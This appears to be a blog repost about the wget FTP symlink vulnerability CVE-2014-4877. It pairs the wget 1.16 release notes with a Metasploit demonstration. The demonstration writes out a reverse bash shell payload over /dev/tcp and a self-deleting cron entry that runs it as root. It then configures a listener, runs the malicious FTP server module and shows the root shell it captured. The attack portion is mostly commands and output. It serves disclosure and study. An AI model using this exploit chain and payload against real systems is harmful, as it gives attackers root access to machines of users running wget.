2014. 10. 31. 18:03

Wget FTP Symlink Attack Vulnerability



[Bug-wget] GNU wget 1.16 released

It is available for download here:


and the GPG detached signatures using the key E163E1EA:


To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:


* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.

"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"



We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.


msfpayload cmd/unix/reverse_bash LHOST= LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/;sh <&112 >&112 2>&112


Next we create a crontab file that runs once a minute, launches this command, and deletes itself:


cat>cronshell <<EOD


* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell



Now we start up msfconsole and configure a shell listener:



msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on


Finally we switch to the wget module itself:


msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m

[*] Server started.


At this point, we just wait for the target user to run wget -m


[*] Logged in with user 'anonymous' and password 'anonymous'...

[*] -> LIST -a

[*] -> CWD /1X9ftwhI7G1ENa

[*] -> LIST -a

[*] -> RETR cronshell

[+] Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened ( -> at 2014-10-27 23:19:02 -0500



msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...



uid=0(root) gid=0(root) groups=0(root),1001(rvm)

Trackback 0 Comment 0